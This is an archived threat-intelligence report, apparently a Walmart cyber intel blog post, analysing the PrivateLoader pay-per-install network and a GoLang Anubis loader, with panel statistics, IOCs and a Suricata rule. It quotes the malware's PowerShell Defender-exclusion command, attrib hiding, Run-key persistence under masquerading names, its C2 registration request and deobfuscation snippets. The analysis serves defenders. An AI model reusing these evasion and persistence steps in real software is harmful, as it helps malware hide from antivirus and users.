{
	"id": "f5566dd9-0a33-4a55-97a2-f0f6151bb570",
	"created_at": "2026-04-06T01:32:22.348303Z",
	"updated_at": "2026-04-10T13:11:39.178229Z",
	"deleted_at": null,
	"sha1_hash": "22f00de0afb4524363defeb56d3c3b57b690c80a",
	"title": "PrivateLoader to Anubis Loader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3022909,
	"plain_text": "PrivateLoader to Anubis Loader\r\nBy Jason Reaves\r\nPublished: 2022-02-14 · Archived: 2026-04-06 00:35:07 UTC\r\n6 min read\r\nFeb 14, 2022\r\nBy: Jason Reaves and Joshua Platt\r\nPress enter or click to view image in full size\r\nIntel471 released a report[1] on a loader system being leveraged for distribution of various crimeware malware\r\nfamilies:\r\nQbot\r\nSmokeLoader\r\nTrickBot\r\nNanoCore RAT\r\nRedline stealer\r\nnjRat\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 1 of 17\n\nDjvu ransomware\r\nVidar stealer\r\nRemcos RAT\r\nTofsee spambot\r\nQRat\r\nLockbit ransomware\r\nDridex\r\nDanaBot\r\nThe diversity of the malware families led the Walmart Cyber Intel team to investigate further.\r\nInfrastructure Analysis\r\nThe report mentioned an administrator panel located on the main command and control server. The panel is named\r\n“EZCubePanel” by the author. The configuration options are fairly straightforward as laid out in the intel471\r\noffering. The panel is configured to deliver links and browser extensions.\r\nPress enter or click to view image in full size\r\nLinks\r\nThe browser extensions did appear to be suspended at the time but were likely utilized in previous campaigns.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 2 of 17\n\nExtensions\r\nWhile the AdminLTE open source bootstrap template has been implemented to streamline the UI process, the\r\nmain functionality is implemented in php.\r\nCuriously, two geo tags appear to be linked to specific domains. The tag WW_5 is hard coded for ezsoftware[.]ru,\r\nwhile the tag WW_8 is linked to vip-space[.]com \u0026 vip-files[.]com\r\nDomains\r\nInstaller\r\nThe private loader installer makes some interesting requests.\r\n941c7e39e8ea114465eadbd45aa709d55ad36ba551cbbf552e4c09b494a3a32d\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 3 of 17\n\nAfter downloading a proxy list and contacting statistics.php, the payload link is encrypted with a simple xor\r\nroutine and delivered to the client.\r\n\u003e\u003e\u003e for i in range(len(b)):... b[i] ^= 0x1d...\u003e\u003e\u003e bbytearray(b'URL:https://cdn.discordapp. com/atta\r\nDatabase\r\nInfection counts show a large loader based system, which mimics some of the data presented in the report by\r\nIntel471.\r\nExtension infection stats:\r\nLogger infection stats from deliveries:\r\nLoaders Loading Loaders\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 4 of 17\n\nAccording to the report, “Privacy tools” domains were utilized as a primary delivery for SmokeLoader. After\r\nchecking out a few of the domains, some interesting stats were discovered. In November of 2021, over a period of\r\n20 days there were over 125K loads. For December 2021, roughly 82K for pab2 and pab3.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 5 of 17\n\nStats\r\nThe stat panel below appeared to show loads for the affiliate IDs pub1, pub2 and pub3. Nearly 33K loads in nine\r\ndays.\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 6 of 17\n\nCurrent Stats\r\nDuring our investigation we found other loaders delivered by PrivateLoader. Similar to what the report stated.\r\nHowever, during some of the loader executions, we observed traffic that did not appear to line up with the other\r\nstealers.\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 7 of 17\n\nAfter further inspection of the ‘build_dl’ traffic, one of the uncovered loader samples was actually developed in\r\nGoLang.\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nUpon execution, the sample performs a check to see if it has admin privileges by attempting to open\r\n\\\\PHYSICALDRIVE:\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 8 of 17\n\nNext it takes a screenshot:\r\nAnd then proceeds to install itself:\r\nSome of the strings are obfuscated but the deobfuscation is simply subtracting one from every character:\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 9 of 17\n\ndef deobf(a):\r\n b = bytearray(a)\r\n for i in range(len(b)):\r\n b[i] -=1\r\n return b\r\nSo now we can easily map out the install process steps, the malware leverages powershell to setup some exclusion\r\npaths:\r\npowershell -Command Add-MpPreference -ExclusionPath\r\non:\r\n AppData\\Local\\Temp\r\n AppData\\Local\\Microsoft\r\nSets a runkey in Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run and the registry name and install name will\r\nbe randomly generated from a hardcoded list of possibilities, install names:\r\nsvchost\r\ncsrss\r\nrundll32\r\nwinlogon\r\nsmss\r\ntaskhost\r\nunsecapp\r\nAdobeARM\r\nwinsys\r\njusched\r\nBCU\r\nwscntfy\r\nconhost\r\ncsrss\r\ndwm\r\nsidebar\r\nADService\r\nAppServices\r\nacrotray\r\nctfmon\r\nlsass\r\nrealsched\r\nspoolsv\r\nRTHDCPL\r\nRTDCPL\r\nMSASCui\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 10 of 17\n\nFor the registry names:\r\nTrion Softworks\r\nMystic Entertainment\r\nMicrosoft Partners\r\nClient-Server Runtime Subsystem\r\nNetworking Service\r\nAfter then moving itself to the proper location it will use ‘attrib’ to set itself as a system file and hidden:\r\nattrib +S +H\r\nAlong with altering the HOSTS file: (edited for brevity)\r\nAnd flushing the DNS cache:\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 11 of 17\n\nipconfig //flushdns\r\nAfter installation the bot will connect to the C2 either over HTTP or TCP and register itself by sending various\r\ninformation back to the C2 via TCP:\r\nmd5(cmd /c whoami) +\r\n“-\u003eReg-\u003e[“ +\r\nDatetime +\r\n”]-\u003e” +\r\n\u003ccmd /c whoami\u003e +\r\n“-\u003e” +\r\n\u003cwmic cpu get name\u003e +\r\n“-\u003e” +\r\n\u003cwmic path win32_VideoController get name\u003e +\r\n“-\u003e” +\r\n\u003ccmd /C ver\u003e +\r\n“-\u003e” +\r\nBot Build +\r\n\u003cisAdmin()\u003e\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 12 of 17\n\nBot registration\r\nFor HTTP traffic an example can be seen below, the data sent to the server is obfuscated by adding two to every\r\nbyte:\r\nPOST /callback HTTP/1.1\r\nHost: redacted.x.x.x\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 57\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzipcallback=HktgYcnn%22Cffgf%22%2F%22lwuejgf\u0026reginfo=WugtMKV\r\nAfter registration, the bot will check for tasks to perform:\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 13 of 17\n\nTask parsing\r\nPress enter or click to view image in full size\r\nTask Commands\r\nPanel\r\nThe panel refers to itself as ‘ANUBIS PANEL’ and contains roughly 20K bots. The bots appeared to be leveraged\r\nfor crypto mining and distributing other malware.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 14 of 17\n\nPPI stats\r\nBy country:\r\nCountry map for installs:\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 15 of 17\n\nInstall stat slice from January:\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 16 of 17\n\nThe stats clearly show Anubis operators have been delivering thousands of installs each week. In the case of\r\nAnubis, more than 500 unique binaries were distributed. The delivered tasks from Anubis also appear to similarly\r\noverlap with those of PrivateLoader.\r\nOver a period of 12 days, more than 11 GB of stealer logs were collected. While cracked software is often\r\noverlooked in the world of CyberCrime, it is clearly underestimated as a tactic.\r\nIOCs\r\nPrivacy-tools-for-you-777[.]com\r\n2.56.59[.]42\r\n212.193.30[.]29\r\n212.193.30[.]45\r\nprivacy-tools-for-you-782[.]com\r\nfile-coin-host-12[.]com\r\nhost-file-file0[.]com\r\nprivacy-tools-for-you-781[.]com\r\ncoin-file-file-19[.]com\r\ncoin-coin-file-9[.]com\r\nfile-file-host8[.]com\r\ndata-host-coin-8[.]com\r\nfile-file-host4[.]com\r\nhost-data-coin-11[.]comAnubis Loader:\r\n84b33d3b0c1e396758f9591e797f5b0029be3f6a752dc2bec2dc20a85d68adda\r\nb7e657155c23d71f732171d68764793bb6010d42da1f80eb4dc9a630aeae1307\r\n4b5b660add37cd7a6d6a2444c3d410ed0de1c24e59c5e1d0091976bbc8099fef\r\nTCP traffic suricata rule:\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any ( msg:\"Anubis Registration\"; content:\"|54 67 69 2f 40|\"\r\nReferences\r\n1: https://intel471.com/blog/privateloader-malware\r\n2: https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer\r\nSource: https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e"
	],
	"report_names": [
		"privateloader-to-anubis-loader-55d066a2653e"
	],
	"threat_actors": [],
	"ts_created_at": 1775439142,
	"ts_updated_at": 1775826699,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/22f00de0afb4524363defeb56d3c3b57b690c80a.pdf",
		"text": "https://archive.orkl.eu/22f00de0afb4524363defeb56d3c3b57b690c80a.txt",
		"img": "https://archive.orkl.eu/22f00de0afb4524363defeb56d3c3b57b690c80a.jpg"
	}
}